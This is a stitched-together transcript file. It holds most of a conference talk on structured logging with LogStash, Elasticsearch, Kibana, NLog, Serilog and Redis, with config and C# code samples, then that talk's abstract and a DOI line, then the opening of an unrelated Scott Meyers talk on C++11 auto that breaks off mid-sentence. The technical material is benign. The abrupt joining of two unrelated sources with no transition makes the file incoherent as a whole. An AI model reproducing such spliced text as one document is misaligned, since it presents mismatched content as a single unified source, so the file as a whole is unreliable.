the outputs that write the data somewhere else. So, typically here, you can have a number of inputs. It can be access logs. It can be the Windows event logs. 
It can be your application logs. Then you process it in the pipeline. And then you output it to somewhere else. So, let's have a look at our setup. For the input in this scenario, we use a file input. It basically traverses the file system looking for log files. It has a few options where we give it a path to look for the logs, and where it should put the so-called sincedb. And that's basically where it keeps its state. So, if it restarts, then it doesn't, you know, look through all the files again. It starts from where it left off. The next thing we are going to look at is the filter. This particular filter is called grok. If you have done compiler techniques or something like that during your studies, you're familiar with a lexical analyzer. And you can think of this as a lexical analyzer where we have a number of well-defined tokens or token types. So, here we have a timestamp format. And here we say what should be the name of that property in our results. So this is a pretty big thing. Like I said, in this case, we are parsing IIS logs. And if you've never seen such a log, you can have a look here. All the log files start with a header, and then each request to the web server creates one line. And this is a pretty ugly format if you want to parse it. It's even worse than you see here on the screen because tabs and spaces have different meanings. So that's pretty awful. And as an extra bonus, it changes between IIS versions. So if you got it right, then after an upgrade you can be in trouble. But here again, you do some trial and error, and then you arrive at something like this that tends to work. And what you get out is this. Just a JSON object with a number of fields. So you can probably recognize some of the properties here as the token definitions that we had earlier on. But the main point here is that we get JSON out, and that's a well-structured format. 
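The kind of grok filter he arrives at for IIS logs can be sketched roughly like this. The field names after each colon are my own choices, and the pattern must be adapted to the `Fields:` header of your actual logs:

```
filter {
  # IIS writes '#'-prefixed comment headers; drop those lines
  if [message] =~ "^#" {
    drop {}
  }
  grok {
    # Simplified pattern for a default W3C-format line; adjust the
    # tokens to match the exact field order in your own logs
    match => ["message",
      "%{TIMESTAMP_ISO8601:log_timestamp} %{IPORHOST:serverip} %{WORD:method} %{URIPATH:page} %{NOTSPACE:querystring} %{NUMBER:port} %{NOTSPACE:username} %{IPORHOST:clientip} %{NOTSPACE:useragent} %{NUMBER:status} %{NUMBER:substatus} %{NUMBER:win32status} %{NUMBER:timetaken}"]
  }
}
```

Each `%{PATTERN:name}` pair is one of the well-defined tokens he mentions, with the property name the value gets in the resulting JSON document.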
But we can do more in the pipeline. Here the geoip filter tries to pick up the IP address of the client and add geolocation information from that. It has a database of well-known IP addresses. So there is one interesting thing you can do when you enrich the data like this. Let me just show you here. I have cheated a little bit, and I have a definition here where I can have a heat map of the requests. So if I change the view here, the time span, then the map is updated with where our visitors come from. So this is the kind of thing that you can do when you enrich your log data with the LogStash plugins. So that's pretty neat. Okay. And the second filter actually parses the datetime value into something useful for Elasticsearch, because like you see here, there is a timestamp. We give it a format, and then we tell it that this is actually UTC time, and then we can use that time to display the event in the graph. Again, this is transformation of the data in the processing pipeline. So when that is done, we can write our logs to Elasticsearch. In this case, we are using the REST API over the HTTP protocol, and we output the data. So let's put these three things together. We have our logs, in our case the IIS logs, we get them into LogStash, enrich and transform, and then we store them as JSON objects in Elasticsearch. And there they are available for the Kibana user interface to show to us. So that's a pretty good setup. We're pretty happy with that. Or are we? Maybe we can improve this. Torstein, do you have any idea? Yeah, I got some ideas. Can you hear me? Yeah, we can. So let's think about what we're doing. We're taking structured data. We then store it as unstructured data in textual log files, and then we try to parse it back into structured data. There's something that's not right here. The thing we have to think about is, can we do something better? 
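As a recap of Vidar's setup, the whole pipeline, file input, grok, geoip, date filter and Elasticsearch output, could be sketched in one logstash.conf like this. Paths, the grok pattern and the host are illustrative, in LogStash 1.x-era syntax:

```
input {
  file {
    path => "C:/inetpub/logs/LogFiles/W3SVC1/*.log"
    sincedb_path => "C:/logstash/sincedb"
  }
}

filter {
  grok {
    match => ["message", "%{TIMESTAMP_ISO8601:log_timestamp} %{WORD:method} %{URIPATH:page} %{IPORHOST:clientip} %{NUMBER:status}"]
  }
  # Enrich each event with geolocation based on the client IP
  geoip {
    source => "clientip"
  }
  # Parse the timestamp and tell LogStash it is UTC, so the event
  # lands at the right spot on the Kibana timeline
  date {
    match => ["log_timestamp", "YYYY-MM-dd HH:mm:ss"]
    timezone => "UTC"
  }
}

output {
  # Write each event as a JSON document over the REST API
  elasticsearch {
    protocol => "http"
    host => "localhost"
  }
}
```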
And in the case that we just showed, where we get access logs from IIS, we can't do anything about it, because it's a third party that is generating the logs for us. We don't own it and can't control it. So LogStash is a helpful tool for that specific scenario. But when we own the system, or have our own applications that we control the source code for, we can actually start improving this. And instead of logging to files or to a very strict database format, we can actually start storing it as structured data, as JSON documents or whatever. So what I'm going to make you think about is, how can we do this in an existing application? So let's pretend that we have an existing application that you own that spits out megabytes of logs every hour, and it stores them in text files. What we could do is add a little extension to your already existing application that already logs to files or a database, and we can extend it so that it logs to Elasticsearch as well. So we can make the log extension pick up the log event that normally goes into the file, but also send it to Elasticsearch. And then you can start viewing it in Kibana as we just showed you. And the reason for this is that there are two things that you have to think about here. The first thing is that some organizations might have reservations about introducing this system in their production environment, and by doing this, you can safely just start introducing it and trying it out without changing anything in the existing solution. And you also get to keep all your existing logs the way they are. So if operations have to have it in text files, they will still have them in text files, but if you are going to debug the system, you can go into Kibana. So this is just a way to introduce it in your existing system without going all in. So I'm going to do a code demo for you. Just have to log in. 
Lovely picture, I know. Let's try to get the password right. Yay! All right. So right here, I've got what kind of simulates your existing app. This is a standard out-of-the-box ASP.NET MVC template application. The only thing I've done to this is add NLog and also create some logging in different controllers just to get some output. And this already logs to a file and to the console. And it doesn't matter that it's NLog, it could just as well be log4net or any other logging solution. I just like NLog, so I'm showing you an extension for that. So I have to go to the correct git branch. So, reload. And I already got one component in place. That's just a thing that does an asynchronous POST call to Elasticsearch to store the data. There is some nasty error handling here. Don't ask about it, but you can check out this code later on GitHub if you want to. So what we're going to start out with is to take something that can take a log event from NLog and transform it into a JSON object. So I'm going to create a JSON dump layout renderer. A layout renderer is a concept in NLog. So I got some skeleton code here. I'm going to show you. So we have some things we have to add in order for NLog to pick it up. We have the name of the layout, and we have a method that appends the rendered log event to a string builder. And what we have to do is write the code that actually takes the log event and transforms it to JSON. And I've got some code for that that I'm going to walk you through now. So the first thing is that we have a dynamic object here. This is very useful in this case because we don't have a schema. We don't have a structured database. We have a schemaless JSON document that we can add any property we want to. So in this case, I'm just mapping over the level from the log event and the logger name. And then I have a little hack here. The reason for this hack is that I want to have this at sign on the timestamp. 
And the reason for that is that I wanted it to work out of the box with the logstash format, which then in turn works out of the box with Kibana. So by doing this, I don't have to modify any settings in Kibana. It will just work when I start pushing data in. And the other thing, and this is just a helpful hint: try always to use UTC time on your log data. So you normalize them when you put them in. That will help you a lot when you want to visualize them. So this next part is just getting different properties and storing them. Like getting the identity, machine name, Windows identity, the thread ID and process ID. These are useful properties that you probably wouldn't put in a text file because it takes too much space, or it's difficult to know which property is the thread ID and which is the process ID. But here we have a structure. So we give each property a name, so you can easily figure out what it is. And I'm using built-in NLog tools here to get this data, so I don't have to write it myself. Again, this is something you can customize and adapt to log4net or any other tool. So the last thing I do here is, if there's an exception, I add some data for that as well. And again, I'm using the dynamic type. And I get the name of the type, the message, the stack trace and some other data. I just want to show you one thing before I go on. I just want to show you how this actually looks before I add the configuration to NLog. So here I have the application. It's wonderful. And if you look at the console here, we have some log statements. And it actually logs when I click around here. I can actually make an exception if I want to. So we have existing logging here that logs both to the console as well as to a file folder here. So I got this both in the text file and in the console. Just wanted to show you that before I hook in the Elasticsearch part. Now, so now we have something that actually takes a log event and outputs JSON. 
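To give an idea of the shape of that output, a single rendered event might come out as a document along these lines. The values and exact property names here are illustrative, not taken from the actual demo code:

```json
{
  "@timestamp": "2014-06-04T10:12:33.214Z",
  "level": "Error",
  "logger": "MyApp.Controllers.HomeController",
  "message": "Something went wrong loading the page",
  "machineName": "WEB01",
  "windowsIdentity": "WEB01\\AppPool",
  "threadId": 12,
  "processId": 4711,
  "errorDetails": {
    "type": "System.InvalidOperationException",
    "message": "Sequence contains no elements",
    "stackTrace": "..."
  }
}
```

Because each value has a named property, and the exception is a nested sub-document, Elasticsearch can index every field individually instead of treating the event as one opaque line of text.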
The next thing I have to make is the target. That is just the name in NLog for somewhere you store the log event. So I'm going to make an Elasticsearch target. And again, I have some skeleton code. We give it a name. We have a base class that makes it work with NLog. And I'm going to have one parameter on this extension, or target, which is the URL to NLog, no, sorry, to Elasticsearch. And we have a hard-coded layout, because this won't work with any other type of layout than the one we just created. So we have to do some logic when we write. And what we're basically going to try to do is send it to Elasticsearch. And if it fails, we're going to handle the error gracefully. And the logic behind sending it to Elasticsearch is pretty simple. All you have to do is render the JSON. So I'm sending in the log event here, and it will actually go through this JSON dump layout renderer, which will just pick out the properties and return a string with JSON right here. There is also some logic for rendering the URI here, so we have to do that. So again, this is the parameter in. This will contain a date-time that is dynamic. So it has to render it, and it just returns a URI type. And the next thing here is just setting up the web client and making an asynchronous POST call here. Again, the way this is written is to make it fault tolerant. So if I stop Elasticsearch, you won't get any exceptions or any errors in the application. It just won't log anything. So it's pretty fault tolerant. So now we have just created something that can connect to Elasticsearch and put the JSON in there. Again, this is the simple REST interface. There's no library here. This is an HTTP POST call over to Elasticsearch. No magic. So the last thing we have to do in order to make this work is extend the existing configuration. So here you see the file and debugger targets that I showed you. 
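A condensed sketch of those two NLog extension points, the layout renderer and the target, might look roughly like this. The class names, index naming and deliberately minimal error handling are my own; the real demo code on GitHub does it asynchronously and more carefully:

```csharp
using System;
using System.Collections.Generic;
using System.Dynamic;
using System.Net;
using System.Text;
using Newtonsoft.Json;
using NLog;
using NLog.LayoutRenderers;
using NLog.Targets;

// Renders a log event as a JSON document
[LayoutRenderer("json-dump")]
public class JsonDumpLayoutRenderer : LayoutRenderer
{
    protected override void Append(StringBuilder builder, LogEventInfo logEvent)
    {
        dynamic doc = new ExpandoObject();
        // "@timestamp" in UTC lines the document up with the logstash
        // conventions that Kibana expects out of the box
        ((IDictionary<string, object>)doc)["@timestamp"] =
            logEvent.TimeStamp.ToUniversalTime();
        doc.level = logEvent.Level.Name;
        doc.logger = logEvent.LoggerName;
        doc.message = logEvent.FormattedMessage;
        if (logEvent.Exception != null)
        {
            doc.errorDetails = new
            {
                type = logEvent.Exception.GetType().FullName,
                message = logEvent.Exception.Message,
                stackTrace = logEvent.Exception.StackTrace
            };
        }
        builder.Append(JsonConvert.SerializeObject(doc));
    }
}

// Ships the rendered JSON to Elasticsearch over plain HTTP
[Target("Elasticsearch")]
public class ElasticsearchTarget : TargetWithLayout
{
    public string Url { get; set; } // e.g. http://localhost:9200

    protected override void Write(LogEventInfo logEvent)
    {
        string json = Layout.Render(logEvent);
        string index = "logstash-" + DateTime.UtcNow.ToString("yyyy.MM.dd");
        try
        {
            using (var client = new WebClient())
            {
                client.Headers[HttpRequestHeader.ContentType] = "application/json";
                // POSTing to /<index>/<type> lets Elasticsearch assign an id
                client.UploadString(Url + "/" + index + "/logevent", json);
            }
        }
        catch (WebException)
        {
            // Swallow network errors so an unreachable Elasticsearch
            // never takes the application down with it
        }
    }
}
```

In NLog.config you would then register the containing assembly under `<extensions>`, declare a target of type `Elasticsearch` with its URL, and add a rule writing to it, which is what the next part of the demo walks through.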
So the first thing you have to do in this configuration is tell NLog that we have an extension. And we just say which assembly contains the extension. And in this case, it's the assembly I'm working in right now. So the next thing is to add the target. Like you see, I'm giving it the name of this Elasticsearch target. And I'm giving it the URL. I have it on localhost. I'm using the default logstash format for the index here. That is, again, to make it work out of the box with Kibana. And I'm just giving it a name for the log source. In this case, it's my application. So the last thing I have to do in this file is just tell it that everything that is logged should also be written to Elasticsearch. So that's it. So if I run up this application right now, I should actually be able to see the log events in Kibana. So let's see what we got here. I have to refresh this. And voila, we have some log data here. So now you can see that the thing that we only saw in the console, I have here. But I can just click around to get some more log statements. So I'm just going to click like so, make it crash. So now we see that we get more and more errors. And what you can notice here is that I can customize these views. I can make my own kind of dashboard here. Again, Kibana is extremely configurable. You can make it suit your own needs and make your own dashboards. Again, if you click on this error here, I have logged the exception. No, sorry, here's the exception. So again, if I just want to show you the JSON behind this, you can see all the properties here that I added. And then you also see that the error details here is another sub-document. So it's structured. So I can search now. I'm just going to show you something here. If I make it crash two times, just refresh this. I can search for all the messages that have an error or exception: _exists_:exception. I have a cheat sheet here. 
That did not work. Sorry. It's not an exception, of course. Good thing. It's... what did I call it? Error details in this case. No, it's case sensitive. ErrorDetails. All right. So again, this is Lucene and Elasticsearch working together to give me a powerful query syntax where I can find exactly what I'm looking for. And you most likely couldn't do this in a text file. At least not this simply. So again, I have structured data. I can also filter. If I remove this, right here, I can actually just show, for instance, the info messages by adding a filter. So right here, I'm just showing the info messages. And it's really neat. So that was the first demo. All right. So I just talked about NLog and extending an existing application that already had logging set up. And I now want to introduce Serilog, which is a new logging framework that has a fresh take on how to do logging. And the reason I want to introduce this is because it's kind of the second iteration of structured logging. So this takes it one step further. And what it does is it makes it dead simple to add more context into your logs and get more data in there, without having to write a lot of code in order to do that. So the framework actually helps you get a lot more context into each log statement. And you can also enrich your logs. It's a concept where you have global properties: for instance, if you want to have the machine name or application version on every log message in that application, you can use an enricher to get that. I'm going to show you how this works in a demo. And since it's structured data and built around that, it fits really nicely into Elasticsearch. And if you want to, you can even write this to regular files. And one opportunity we have there is that instead of saving it as rendered text, we can actually store the JSON.
And if we do that, we can actually use LogStash later to pull out these logs and put them directly into Elasticsearch. And the reason for doing that is if you have network connectivity issues, or you don't trust the network, you can actually use this as a local buffer to store your logs. So, again, we have another code demo. So, right here, I have a simple finished console application. And we start out with the logging configuration. This is to set up a logger. And we don't have XML here. So, this is kind of the equivalent of setting up log4net or NLog in XML. So, we specify the log level. The default is information, so I had to set it a bit lower. And then you have a concept of sinks. A sink is just a log target that you write the log to. So, I set it up to log to a colored console. There are several sinks that come out of the box with Serilog. But I also downloaded and added Elasticsearch. So, this is built in. I don't have to make this extension myself like I did in the other demo. And I also used a different index in order to separate the logs from the other demo. And again, if you want to do what I told you with JSON, you can use this syntax right here. All this code is available on GitHub, so you can look into this later. And then I have the enrichers. Again, I'm just going to show you: for instance, if I want all my logs to have a property, say application version, and I say demo 1.0, then all my log statements will have that property. But I can also use other useful properties. I can show you this with machine name. That's useful if you have lots of clients logging. And maybe you want the thread ID. That's also useful. And then you have process ID. So, there's a lot of useful built-in tools, and it's really easy to make extensions to this yourself. So, this is just the logging configuration. So, if I wanted to create a logger for a specific class, I would use this syntax here.
So, this creates a class-specific logger. So, I'm going to show you how this actually looks, if I manage to start this up, right? So, you see that it now logs to the colored console output. And what's worth noticing here is, you see that I put in a dynamic object here. It does serialize that as a text string here in a JSON-ish format. And if we go to the database... no, sorry, the logs, Kibana, we will see that we have this same text now as a data row here. But what's interesting here is, you see, this contains very little context, very little information. This is what we usually put in a file. But if you look here closely, you can see that we suddenly have a lot more properties here. We have, for instance, the source context. We have the application version, the enricher we saw earlier. We have the machine name. We have the thread ID and process ID. We don't have that in the text log. So, we can continue, but there's one more thing to notice here. You notice that this line here is kind of a serialized, flattened version of the dynamic object. If you don't want to flatten it, if you want to keep the structure, you can see here, I have an at sign in front of data. What that does, when it stores this... again, you see it in the text here, it's flattened. But if you look in the database now at the new entry, you will see that it has actually kept these two as two separate fields. So, I have this presenter and users as two different fields. If you look at the JSON again, you'll see here that it's actually an object. So, what I can do now, I can actually add filters saying, okay, give me all the log statements for user Torstein, and it will actually only give me those. So, that's one of the great opportunities you get now with this kind of structured logging. And also, it comes with good exception handling. So, again, where I wrote the code for mapping the exception over to JSON, Serilog has already done that.
So, if I refresh here, I will see, again, I have a lot more context here. I have the exception class name and message, and I get the stack trace and everything if I want. There are some more things in this demo, but I think I will leave that to you later. There is a concept of log context which can scope one of the enriched properties to just one block of code. So, there is a lot of things here in Serilog to help you get more context in your logs without having to clutter your code with a lot of string formatting or whatever. So, what I just showed you was two approaches to handling logging. In the case where you already have an existing application where you can't just switch out the logging, you can add an extension to your existing logging framework. Be it NLog or log4net or whatever, you can probably make an extension to it that just does an HTTP POST to Elasticsearch. And if you are making a new application, I would recommend you look into Serilog, because it has a new take on how you do logging, and it makes it really simple to get the structure and context in there. But there are some architectural things to consider. If you have 800 clients spitting out 500 logs a minute, you might get some issues that I think Vidar can help you handle. Okay, sure. So, just to summarize what Torstein has now shown you: we have seen a little bit simpler architecture where we push things directly into Elasticsearch. But we are working on our mantra today: keep structure in the logs. We have seen that we can enrich the JSON objects with more metadata and more data that are very useful for us when we want to make sense of and retrieve the log information. And also we have seen that the logs are aggregated right away. Our application servers write directly to our central location, which is the Elasticsearch cluster, so we don't have to make an extra step to gather all the data from our application servers.
And we have also seen that it is very easy for an application to talk to Elasticsearch, because it is an HTTP REST-based API. But wait a second. Torstein, have you ever heard of the fallacies of distributed computing? Fallacy of what? So it was something that was formulated around the time you were born. Basically it was formulated by Peter Deutsch, I think in the early 90s. Here they are. But in this scenario, I'm most concerned with the first one. We assume that the network is reliable. And that could be a problem. If I'm concerned with losing logs, if I don't want to lose logs, this approach will not work when the network is down. So to fix that, in that situation, we throw another component into the mix, and that is the Redis database. Redis is a NoSQL database. Its main purpose here is to temporarily store the data before we move it into Elasticsearch. It's a key-value store. Basically what we do is that we add those JSON objects onto a list in Redis, and then we have LogStash pulling those from that list asynchronously. It doesn't have to be Redis. The point is that we need to write the data fast, so that the application can get rid of the log data and move on. So what we can then do, we can create an extension in the same manner as Torstein showed you, that actually stores those JSON objects in Redis instead of writing directly to Elasticsearch. Then LogStash can come along whenever it's ready, pull that data, and do the transforms if it must. As you've seen, it's already JSON, so we don't have to parse it. We just have to transform it, enrich it maybe, and then push it into Elasticsearch. So we've traded a little bit of simplicity for reliability. What we then can do is that we can easily scale out our application servers. It's still going to be very easy to pull that information into Elasticsearch.
But the thing is that we can deploy the Redis database locally on the server, so that we don't have to write over the network all the time. So if the network is down, we store it locally, and then when the network is up again, LogStash comes along and pulls it into Elasticsearch. We can then even scale out the Elasticsearch infrastructure. We haven't said so much about that, but it is a highly scalable search solution, so we can easily scale it if you want to handle more data or have a better real-time view of the data. So we lose a little simplicity, but now we have a distributed solution. So let's try to wrap this up. Once again, consider the logging during the entire lifecycle of your application. Not just during development, not just during operations, but try to combine it. We have seen tools that can help you aggregate the logs, make them current at all times, make them available and make them visual to you. Use a structured format if you can, all the way. Torstein has showed you a situation where you can control your application and how it logs. Then you should aim for a structured format. In this case, we use JSON, and that's because all the tools in our pipeline are able to handle that. If you cannot do that, if you cannot control the source of your logs... you cannot control IIS, it will always write its log statements to a file... then you can use LogStash to parse it before you transform and enrich the data. And then finally use Elasticsearch to aggregate the data. And also, like Torstein said earlier, you can store it temporarily locally if you are concerned with losing data. That could be a good idea. So you can throw a technology like Redis into the mix if you want to. And like Torstein said, it's not necessary to go all in. You can build this piece by piece. You can start off with LogStash, parse your access logs, your Windows event logs.
Then you can move on, for instance, to add your application logs to the mix. You can even parse the application logs if you cannot touch the application. So do it gradually. And if you get to the point where you actually manage to get your data into Elasticsearch, you open up a whole new set of opportunities. So it's interesting. I've tried this out a bit. And using Kibana, which is a generic visualization tool, you can actually start seeing patterns in your logs. And this is really interesting, because in a flat log file, you won't see that you have accumulating errors. You can't see that. What you can see in Kibana, if you, for instance, split the log into log event groups, so you have red for error, yellow for warning, et cetera, is that the red line will peak up. And then you can actually see that, oh, here we had a lot of errors going on. And then you can zoom into that area. And then you can filter on all the errors. And you can see, hmm, what kind of messages are these? Where are the error messages coming from? Then you can see, oh, it's a database timeout. Let's look closer at that. And what you can actually start doing, you can start drilling down, for instance, distributing it across which service or server is throwing the error. Then you might notice that, oh, it's just one of the three load-balanced servers that is having an issue. And then you probably know that, okay, we have to look into this, what's going on. I'll come back to you in a minute. And you also get kind of the big data approach here. You have a lot of data, and you can actually structure and find out a lot more things about your application, because you have the data. You can actually start learning about how your application really works. And then you can take this one step further. With LogStash, you can actually start taking performance counters from Windows and adding them into the log as well.
So you can monitor CPU usage, memory usage, and also correlate that with log events. For instance, if you have a timeout, maybe the CPU load is really high at that point. So there's a lot of new opportunities. And again, it's not only for logging; you can use it for more. We have some links. We have a short link to all of this on the last slide. And you will also be able to find this presentation online later. We'll tweet the link for you. So there are three things that we want to say now. We're going to stick around here after the session if you want to come and ask us questions. And if you want to catch us later, we'll probably be at the Bekk booth. That's where you get the nice coffee. And remember to cast a vote when you leave the area. So we will take questions now, if there are any. You're first. You're using Kibana as an analysis tool. Could you also use it as a monitoring tool with thresholds and alerts on live data? So, to repeat the question: can we use Kibana to monitor and throw alerts on certain events? The answer is no. There is a tool that does this today, and it's called Splunk. It's an enterprise log and event tool which does that. But again, I've actually thought about that scenario, and what I was thinking of: if you defined your criteria for what should trigger, for instance an exception, you can use Kibana to get the query it sends to Elasticsearch. And then my idea is that you can just take that query that you made in Kibana and copy it over to a new tool that just sends an email or whatever when that query returns a result. So it doesn't do it today, but I think it's really easy to extend. Maybe I can show it. Yeah, you can show it. Just real quick. Sorry. Okay. Vidar first. Can you show the query inspection? Just one second. So what you basically can do is that you can repeat whatever query Kibana makes to Elasticsearch. So if you look at the inspect... can you all see that?
It's an inspect icon, and then you get a curl command that can repeat that query. And you can just copy and paste that into any tool that monitors that query. So, yeah. Why do you use Redis instead of a message bus, like for example RabbitMQ, when this is obviously messages going out? No, like I said, it's just a random tool. You can use pretty much anything you want. The thing with Redis is the simplicity of the setup. So like I said, if you want to deploy it locally on the application server, it's really easy to package it and run it locally. And also, it's very fast to write to. So you push away the log as soon as possible, so that the application can do whatever it wants. I'm sure there are many technologies that could do that. Redis is just one of them. So the question is if we can get access in C# code to the event logs, is that the question? Or performance? Yeah. Yeah. If I was starting a new application, I would probably try out Serilog. I've done some experimentation with it, and it fits really nicely into this kind of context and structured logging. The way it lets you forward structured data into the logs is really simple. And in, for instance, NLog and log4net, you have the string format syntax, and I think that results in a lot of noise. And it's also difficult to get context. For instance, if you have an iteration over a lot of objects, you might want to have a property on all the log statements within that context, for instance which user it's doing things for. Did that answer your question? Also a related question. And then if you use the Elasticsearch sink as you showed, then you can bypass LogStash. Yes. That's a gain you get. So you don't have to have LogStash if you use Serilog with the Elasticsearch sink. So that's one piece less in the architecture.
If you did both of them... you actually pushed it directly, but also logged to a file meanwhile... and then there was a transient network outage, and you said, okay, now the LogStash process should recover it. Would you get duplicate events? So the question is, if I log both to file and Elasticsearch and there's a network outage, and I want to recover, kind of get the data from the file into Elasticsearch, will I get duplicate events? Yes, you will, unless you actually try to figure out if it's already present. So there's no finished solution for that. But again, a little bit of PowerShell magic and I think you'll do okay. How fast is the data available in Elasticsearch? Could you use it in real time? So the question was how fast the data is available in Elasticsearch and if you can use it in real time. And I believe it's very fast. So it's very good for a real-time solution. But of course, if you do this intermediate step with LogStash, there might be a few extra seconds of lag. But if you write directly to Elasticsearch, it's pretty much instant. There's a refresh about once per second, so it's near real time. Yeah. For searches. And for gets it's real time. Okay, so we have some extra information: around a second until it's available. So that's pretty good. More questions? Yeah. Yeah. So the question was if we have looked into correlation information, so that if you have logs from IIS and from application logs, you can, you know, correlate them. This is something that you can do, but that's custom code, I think. With the metadata that you can add from the application, you can certainly have a correlation ID per request that you can use to follow the requests. If there are any tools for that, for instance in IIS, I don't know. You just reminded me of a point I wanted to make. Like I said, when you already have logging with context in your application, there are some low-hanging fruits here.
And if you have a complex system with lots of applications and lots of services running, and you want to correlate log events that go from, let's say, a web page that the end user uses, and you want to track all the log messages from the time the user clicks until it's finished and has done all its things. And let's say that this infrastructure consists of WCF services, HTTP REST services, and service buses. I've tried out adding a correlation ID throughout all of these requests going all around the system. And what this means is that you can actually follow, like a red thread, all the things that happened from that one click, and see all the logs and all the exceptions that might have happened on this trip around your system. And that is something you can do really easily when you have the data in Elasticsearch. All you have to do is just search for that correlation ID in Kibana, and all the logs, let's say the 50 log statements that are related to that one action, will be available. You can also extend this a lot, but it's just something to think about. It's a low-hanging fruit that you can actually just pick and start trying out in your application. Just a helpful warning: extending WCF is probably not something you want to do, but I'm probably going to release a set of extension plugins on GitHub later that actually do the boilerplate for you, so you can just pick the component and add it to your application. So, any more questions? You're doing the same... interesting. The timeframe is unknown. But again, I have some finished code that is actually working now, but I haven't done a quality check on it, and I'm worried about the thread safety of my code. So I have to learn more about how WCF works before I can release this. I can release it, of course, and get patches, but I want to do quality assurance on it before I release it. All right. Okay. Then thank you. Have a nice party tonight.
Developers, it's time to stop for a moment and think about logging in your application! Too often we neglect this topic, and someone is paying the price. We're seeing DevOps gaining ground, and we're seeing more complex deployments in the cloud. This makes it necessary for us to consider logging and monitoring, but it also opens up new possibilities. This talk will introduce you to Elasticsearch and LogStash, two emerging products gaining traction that can take logging to the next level. We'll show you how to use them in various scenarios and explain what they solve for you. We'll show how to gather and display real-time logging information from your .NET applications and Windows installations. The talk is hands-on and will feature a lot of demos.
10.5446/50638 (DOI)
Well, good morning. I'm Scott Meyers. I thought I'd be talking a little bit about C++ today. I am standing in the only location I can find on the entire stage where I can actually see you. This is relevant because if you want to ask questions and you raise your hand, I'm probably not going to be able to see you. So this is what we're going to do. Normally, what I tell people is if they don't understand something or if they're a little concerned, they should ask a question, which I want to encourage. If you feel uncomfortable asking a question, what I normally encourage people to do is to look really confused and to stare directly at me. But that's not going to work, because I have lights in my eyes and I won't be able to see you. So you have two choices. One of them is you can make lots of motion like this, because I think, like insects, I can in fact detect motion. So that's one possibility. Or if you see me go to the only location on the stage where I can see you, that might help. Or you can start making really uncomfortable sounds as if there's just something terribly wrong, and then I'll try and figure out what's going on. So that's the plan for questions and answers. Also, if you don't want me to see you, you need to encourage me to go any place except that one location on the stage. I want to talk today about effective modern C++, which is the latest project I've been working on, to try to put together guidelines for how to make the most effective use of the language. And in this particular case, when I talk about the language, I'm talking about the new features in C++11 and C++14. So for purposes of the discussion today, I'm assuming you already know everything in C++98. That's old stuff. So the question is, how do you make effective use of the newer stuff? And the outline that I have for the work that I've been doing is to break down the general topic areas in C++11 and C++14. This is what I've broken them down into.
When I started the project, I did not plan to talk about type deduction at all. I don't like talking about type deduction. It's kind of a dull topic. I found out I was unable to discuss C++11, and especially C++14, without explaining how type deduction works, because type deduction is widespread in C++11. It is essentially much more widespread in C++14. That's a whole separate talk. In fact, I'll be giving a talk on that topic this afternoon at 4:20. So that's a different talk. The other topic areas that I have been investigating and putting together guidelines for are these: auto gets its own chapter; a whole bunch of information on changing the habits you have from C++98 when moving to C++11 and C++14, different ways of doing things; a chapter on smart pointers; a chapter on rvalue references; a chapter on lambdas; a chapter on the concurrency API. The only things I'm going to be talking about today, because we have a limited amount of time, is I chose three guidelines that I hope will be useful and give you some insight. They happen to come from the information on auto as well as the information on moving from C++98 to C++11 and 14. And as it turns out, in this particular presentation, I'm not talking about anything specific to C++14 at all. I'm only talking about C++11 stuff. It just kind of worked out that way. And the first guideline I want to give you is to prefer auto to explicit type declarations. So fundamentally, you have a choice here. If I want to create some widget w, I have a choice. I can say, okay, I want a widget called w, by giving the type explicitly, and then I initialize it with some expression of type widget. Or what I could do instead is I could say auto w and then give an expression of type widget. In both cases, they will create a widget object. So what I'm encouraging you to do is to not type out widget expressly, but instead to use auto, which leads to the question: why am I advocating that? So we'll start with the little stuff first.
The little stuff is that using auto saves you some keystrokes, which is important from a typing perspective. It is in some sense more important from a reader's perspective because the more you can get rid of noise that's in your source code, the easier it is for people to understand basically what you are trying to accomplish. So if I have, I guess this is the day for hitting wrong buttons, if I have a vector of string iterators, VSI, so it's just a vector of iterators into some strings, and I want to do something for every iterator in that container, what I could say is, okay, for every string iterator SI in the container VSI, where I'm explicitly stating the type, or I can just say, listen, for every iterator SI in the container, and I just use auto here, my feeling is in this particular case, explicitly stating that it's a string iterator does not add any information that is not already present in the source code. Anybody reading this has got to know this is a container of string iterators or they'll never understand the code. So I think auto makes it easier to understand and of course easier to type. Now, the easier to type thing normally is not a very compelling argument, but there are some cases where it can be helpful. So if I'm writing an algorithm taking a begin and an end iterator, and I decide what I want to do is I want to make a copy of the first element in the range, and we'll make the assumption it's not an empty range. Well, if I have an iterator pointing to something, the question is, what is the type of the thing that it refers to? And I know you all roll your eyes and you say, well, of course, it's type name, standard iterator traits of iterator, colon, colon, value type. Who does not know that? Actually, it turns out several people don't know that. And even if you do know it, I don't know how many people have said, you know, what I'm really looking forward today is typing this many, many times. 
That's not really productivity flowing through your fingers. Now, in this particular case, you can just say auto firstElement is star b. This is very clear. b points to the first element of the range, so this is going to be a copy of it. So I think it's clearer for people to understand. Certainly, it's easier to write. However, that's really a syntactic convenience. There are some more compelling technical reasons for using auto. There are a number of cases in C++ where we think we know what the type of something is, but we're kind of loose about it. We're not actually specific. And here's a common kind of mistake. So if I have a vector of int and I call the size member function, it turns out that the return type of calling size on a vector, in this particular case, is vector of int, colon, colon, size type, which is a typedef for some unsigned type. But the return type is supposed to be vector of int, colon, colon, size type. I don't know anybody who uses that. What most people do is something like saying, ah, it's an unsigned, close enough for government work. It usually works. But as a specific example of a case where it can fail: if you are on a 32-bit Windows system, this is completely safe code. There is nothing wrong with this. But the only reason there is nothing wrong with the code, in the sense that it will actually work under all conditions, is that an unsigned and a vector of int, colon, colon, size type on that platform with that compiler are both 32 bits. So they're the same thing. It doesn't matter. But if you go from 32-bit Windows to 64-bit Windows, suddenly things change, because on a 64-bit Windows platform, an unsigned is 32 bits, but a vector of int, colon, colon, size type is 64 bits, which means as long as the number of elements in the container is 4 billion or fewer, it will work. But if it exceeds 4 billion, you've got a problem.
